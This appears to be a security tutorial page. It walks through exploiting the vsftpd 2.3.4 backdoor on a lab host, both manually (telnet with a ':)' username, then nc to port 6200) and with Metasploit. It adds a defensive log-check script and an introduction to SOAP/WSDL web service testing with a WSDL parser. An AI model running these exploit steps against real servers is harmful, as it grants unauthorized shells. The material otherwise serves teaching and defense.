Manual vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

nmap -p0-65535 192.168.2.129


root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011 it was discovered that the vsftpd 2.3.4 release downloadable from the master site had been compromised. Users logging into a compromised vsftpd 2.3.4 server could issue a “:)” smiley face as the username and gain a command shell on port 6200. This was not a security hole in vsftpd itself; instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site has been moved to Google App Engine.

Let's try to exploit it without Metasploit.

Connect to the vsFTPd server and send a USER name followed by a PASS.

Note: the user name should end with the smiley “:)”.

Whenever a user connects to the vsFTPd server with the smiley in the user name, the backdoor is opened and a listener is started on port 6200 on the FTP server.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER invalid:)
331 Please specify the password.
PASS dont know
^]
telnet> quit
Connection closed.

Close the telnet session and connect back to port 6200 using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

This gives the user a shell on the vsFTPd server without any authentication.


Done 🙂

vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

Identify the vulnerable host and scan it using nmap or any other favourite scanning tool.

nmap -p0-65535 192.168.2.129


The interesting part on this machine is port 21; if we enumerate the FTP service by connecting to port 21 with telnet, we may get some information from the banner.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPd installed, and version 2.3.4 is the backdoored release that allows commands to be executed through the backdoor.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 RHOST                   yes       The target address
 RPORT  21               yes       The target port

Exploit target:

 Id  Name
 --  ----
 0   Automatic

Set RHOST and RPORT, then run the exploit.


Got the shell 🙂
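
For the defender looking after a host like the one in both walkthroughs above (the manual telnet session and the Metasploit module), the two things worth checking are whether the FTP banner identifies the backdoored 2.3.4 build and whether the server log shows anyone sending the “:)” trigger in a USER command. The script below is an added example, not part of the original posts or of the vsftpd project; it assumes vsftpd was logging with log_ftp_protocol=YES (the “FTP command: Client ...” line format), and the log lines and client address 192.168.2.130 are constructed for the demonstration.

```python
import re

# The 220 greeting seen in the telnet sessions; 2.3.4 is the release that shipped the backdoor.
BACKDOORED_BANNER = re.compile(r"^220 \(vsFTPd 2\.3\.4\)")

# vsftpd log line format with log_ftp_protocol=YES (assumption; sample below is constructed).
FTP_COMMAND = re.compile(
    r'^(?P<ts>.+?) \[pid (?P<pid>\d+)\] FTP command: Client "(?P<ip>[^"]+)", "(?P<cmd>[^"]*)"$'
)
# The published trigger is the two characters ":)" inside the USER argument.
TRIGGER = ":)"

# Constructed vsftpd.log excerpt: one normal anonymous login attempt, then one trigger attempt.
SAMPLE_LOG = """\
Sun Jul  3 10:15:01 2011 [pid 2148] CONNECT: Client "192.168.2.130"
Sun Jul  3 10:15:05 2011 [pid 2148] FTP command: Client "192.168.2.130", "USER anonymous"
Sun Jul  3 10:15:05 2011 [pid 2148] FTP response: Client "192.168.2.130", "331 Please specify the password."
Sun Jul  3 10:15:20 2011 [pid 2151] CONNECT: Client "192.168.2.130"
Sun Jul  3 10:15:21 2011 [pid 2151] FTP command: Client "192.168.2.130", "USER invalid:)"
Sun Jul  3 10:15:21 2011 [pid 2151] FTP response: Client "192.168.2.130", "331 Please specify the password."
Sun Jul  3 10:15:22 2011 [pid 2151] FTP command: Client "192.168.2.130", "PASS <password>"
"""


def banner_is_backdoored_version(banner):
    """True when the 220 greeting identifies vsFTPd 2.3.4."""
    return BACKDOORED_BANNER.match(banner.strip()) is not None


def find_backdoor_triggers(log_lines):
    """Return (timestamp, client ip, pid, user argument) for each USER command containing ':)'."""
    hits = []
    for line in log_lines:
        m = FTP_COMMAND.match(line)
        if not m:
            continue  # CONNECT / FTP response lines and anything else are skipped
        verb, _, arg = m.group("cmd").partition(" ")
        if verb.upper() == "USER" and TRIGGER in arg:
            hits.append((m.group("ts"), m.group("ip"), int(m.group("pid")), arg))
    return hits


def triage(banner, log_text):
    """Combine the version check with the log sweep into one summary dict."""
    hits = find_backdoor_triggers(log_text.splitlines())
    return {
        "backdoored_version": banner_is_backdoored_version(banner),
        "trigger_attempts": len(hits),
        "source_ips": sorted({ip for _, ip, _, _ in hits}),
    }


if __name__ == "__main__":
    report = triage("220 (vsFTPd 2.3.4)", SAMPLE_LOG)
    for key, value in report.items():
        print(f"{key}: {value}")
    for ts, ip, pid, arg in find_backdoor_triggers(SAMPLE_LOG.splitlines()):
        print(f"trigger from {ip} at {ts} (pid {pid}): USER {arg}")
```

A positive version check alone is enough to take the host off the network and rebuild it from a verified source tarball; a trigger hit in the log, together with an unexpected listener on TCP 6200 as described above, means the backdoor was actually exercised and the host should be treated as compromised.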

Getting started with Web Penetration Testing

Why web applications are major targets for attackers

  • From the attacker's point of view, web services are easy to penetrate.
  • Web services handle sensitive data, so an attacker can obtain sensitive information.
  • The growth of mobile applications, which rely on web services, attracts attackers to them.
  • Because security controls and resources are often lacking, web services are a likely attack vector.

SOA (Service Oriented Architecture)

Service Oriented Architecture is a software design and architecture pattern based on discrete pieces of software that provide application functionality as services to other applications; this is known as service orientation. A service is a self-contained logical representation of a repeatable function or activity. Services can be combined by other software applications, which together provide the complete functionality of a large software application.

A service is a well-defined activity that does not depend on the state of other services.

Web service

A web service is a standardized way of establishing communication between two web-based applications using open standards over an Internet protocol, HTTP or HTTPS.

  • Web services are application components
  • Web services communicate using open protocols
  • Web services are self-contained and self-describing
  • Web services can be discovered using UDDI
  • Web services can be used by other applications
  • HTTP and XML are the basis for Web services

Advantages

  • Language Interoperability (Programming language independent)
  • Platform Independent (Hardware and OS independent)
  • Function Reusability
  • Firewall Friendly
  • Use of Standardized Protocols
  • Stateless Communication
  • Economic

Components of web services

  • Service Consumer
  • Service Provider
  • XML (Extensible Markup Language)
  • SOAP (Simple Object Access Protocol)
  • WSDL (Web Services Description Language)
  • UDDI (Universal Description, Discovery and Integration)

Simple Object Access Protocol (SOAP)

SOAP is an XML-based protocol that lets applications exchange information over HTTP; web services use the SOAP format to send XML requests.

The actual data flows in the body block, and the metadata is usually carried by the header block.

Web Services Description Language (WSDL)

Web Services Description Language is an XML-based language for describing Web services and how to access them.

As far as pen testing web services is concerned, understanding the WSDL file helps a lot in manual pen testing. We can divide the WSDL file structure into two parts: the first part describes what the web service does, and the second part tells how to access it.

Elements of a WSDL file and what each contains:

  • definitions: the root (parent) element of the WSDL file; all the other XML elements are nested under it.
  • types: all the schema types (data types) are defined here.
  • message: a dependent element; each message is specified in terms of the data types defined in the types element and is used later inside the operation element.
  • portType: collects all the operations within a web service.
  • operation: a collection of input, output, fault and other messages as specified in the message element.
  • input message: the parameters of the method used in the SOAP request.
  • output message: the parameters of the method used in the SOAP response.
  • binding: connects part 2 of the WSDL file with part 1 by associating itself with the portType element, and lets you define the protocol you want to use.
  • soap:binding: formulates the SOAP message at runtime.
  • service: contains the names of all the services provided by the service provider.
  • port: provides the physical path or location of the web server so that the service consumer can connect to the service provider.

Example WSDL file (only the definitions and types sections of the original excerpt are shown)

<?xml version="1.0" encoding="UTF-8" ?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:tns="http://example.in/itrservice/v_1_0" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:itrcmns="http://example.in/ws/ds/common/v_1_0" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" targetNamespace="http://example.in/itrservice/v_1_0">
  <types>
    <xs:schema xmlns:itrException="http://e.gov.in/ws/ds/ex/v_1_0" xmlns:authInfo="http://incometaxindiaefilinge.gov.in/ws/ds/common/v_1_0" targetNamespace="http://incometaxindiaefiling.gove.in/itrservice/v_1_0" elementFormDefault="qualified" attributeFormDefault="unqualified">
      <xs:import namespace="http://example.com/ws/ds/common/v_1_0" schemaLocation="https://incometaxindiaefiling.gov.in/e-FilingWS/xsd/DITWSCommon.xsd" />
      <xs:import namespace="http://example.com/ws/ds/ex/v_1_0" schemaLocation="https://incometaxindiaefiling.gov.in/e-FilingWS/xsd/DITWSITRException.xsd" />
      <xs:element name="ITRInvalidDocFaultException" type="itrException:ITRInvalidDocFaultException" />
      <xs:element name="ITRCredentialFaultException" type="itrException:ITRCredentialFaultException" />
      <xs:element name="ITRInvalidCertificateFaultException" type="itrException:ITRInvalidCertificateFaultException" />
      <xs:element name="ITRServiceFaultException" type="itrException:ITRServiceFaultException" />
      <xs:element name="ITRBusinessServiceFaultException" type="itrException:ITRBusinessServiceFaultException" />
      <xs:element name="ITRFaultException" type="itrException:ITRFaultException" />
    </xs:schema>
  </types>
  <!-- message, portType, binding and service sections follow in a full WSDL file -->
</definitions>
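
Reading a WSDL by hand to find the operations, their input and output messages and the endpoint URL is the first step of the manual pen test described above. The script below is an added example, not part of the original post or of any real service: it parses a small, constructed WSDL (the example.test names, the GetReturnStatus operation and the endpoint URL are all made up for the demonstration) with Python's standard library and builds an inventory of what the service exposes, then flags any endpoint served over plain http://, where SOAP bodies and credentials travel in the clear.

```python
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
SOAP_NS = "http://schemas.xmlsoap.org/wsdl/soap/"

# Constructed minimal WSDL 1.1 document: one operation, one SOAP binding, one endpoint.
SAMPLE_WSDL = """<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
             xmlns:xs="http://www.w3.org/2001/XMLSchema"
             xmlns:tns="http://example.test/itrservice/v_1_0"
             targetNamespace="http://example.test/itrservice/v_1_0">
  <types>
    <xs:schema targetNamespace="http://example.test/itrservice/v_1_0">
      <xs:element name="GetReturnStatusRequest" type="xs:string"/>
      <xs:element name="GetReturnStatusResponse" type="xs:string"/>
    </xs:schema>
  </types>
  <message name="GetReturnStatusIn">
    <part name="body" element="tns:GetReturnStatusRequest"/>
  </message>
  <message name="GetReturnStatusOut">
    <part name="body" element="tns:GetReturnStatusResponse"/>
  </message>
  <portType name="ITRServicePortType">
    <operation name="GetReturnStatus">
      <input message="tns:GetReturnStatusIn"/>
      <output message="tns:GetReturnStatusOut"/>
    </operation>
  </portType>
  <binding name="ITRServiceSoapBinding" type="tns:ITRServicePortType">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetReturnStatus">
      <soap:operation soapAction="urn:GetReturnStatus"/>
      <input><soap:body use="literal"/></input>
      <output><soap:body use="literal"/></output>
    </operation>
  </binding>
  <service name="ITRService">
    <port name="ITRServicePort" binding="tns:ITRServiceSoapBinding">
      <soap:address location="http://example.test/e-FilingWS/ITRService"/>
    </port>
  </service>
</definitions>
"""


def local(qname):
    """Strip a namespace prefix: 'tns:Foo' -> 'Foo'."""
    return qname.split(":")[-1] if qname else qname


def parse_wsdl(text):
    """Return {operation name: {portType, input parts, output parts, soapAction, endpoints}}."""
    # Note: for a WSDL fetched from an untrusted server, parse with defusedxml instead.
    root = ET.fromstring(text)
    w, s = "{%s}" % WSDL_NS, "{%s}" % SOAP_NS

    # Part 1 of the file: message name -> [(part name, element or type)]
    messages = {
        m.get("name"): [(p.get("name"), p.get("element") or p.get("type"))
                        for p in m.findall(w + "part")]
        for m in root.findall(w + "message")
    }

    # Part 2: binding name -> (portType it implements, {operation: soapAction})
    bindings = {}
    for b in root.findall(w + "binding"):
        actions = {}
        for op in b.findall(w + "operation"):
            so = op.find(s + "operation")
            actions[op.get("name")] = so.get("soapAction") if so is not None else None
        bindings[b.get("name")] = (local(b.get("type")), actions)

    # service/port -> endpoint URLs, keyed by the portType reached through each binding
    endpoints = {}
    for svc in root.findall(w + "service"):
        for port in svc.findall(w + "port"):
            addr = port.find(s + "address")
            bname = local(port.get("binding"))
            if addr is not None and bname in bindings:
                endpoints.setdefault(bindings[bname][0], []).append(addr.get("location"))

    ops = {}
    for pt in root.findall(w + "portType"):
        ptname = pt.get("name")
        for op in pt.findall(w + "operation"):
            name = op.get("name")
            inp, out = op.find(w + "input"), op.find(w + "output")
            action = next((acts.get(name) for ptn, acts in bindings.values()
                           if ptn == ptname and name in acts), None)
            ops[name] = {
                "portType": ptname,
                "input": messages.get(local(inp.get("message")), []) if inp is not None else [],
                "output": messages.get(local(out.get("message")), []) if out is not None else [],
                "soapAction": action,
                "endpoints": endpoints.get(ptname, []),
            }
    return ops


def insecure_endpoints(ops):
    """Endpoint URLs that use plain http:// rather than https://."""
    return sorted({url for o in ops.values() for url in o["endpoints"]
                   if url.lower().startswith("http://")})


if __name__ == "__main__":
    inventory = parse_wsdl(SAMPLE_WSDL)
    for name, info in inventory.items():
        print(name, info)
    print("plaintext endpoints:", insecure_endpoints(inventory))
```

The inventory is exactly the list a reviewer wants before testing: every exposed operation, the message parts (and therefore the parameters) it accepts and returns, the soapAction that selects it, and where it is reachable. Because the parser follows message, binding and port references by local name, it also works when the WSDL uses a prefix other than tns.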

WSDL

  • WSDL stands for Web Services Description Language
  • WSDL is an XML-based language for describing Web services.
  • WSDL is a W3C recommendation

SOAP

  • SOAP stands for Simple Object Access Protocol
  • SOAP is an XML-based protocol for accessing Web Services.
  • SOAP is based on XML
  • SOAP is a W3C recommendation
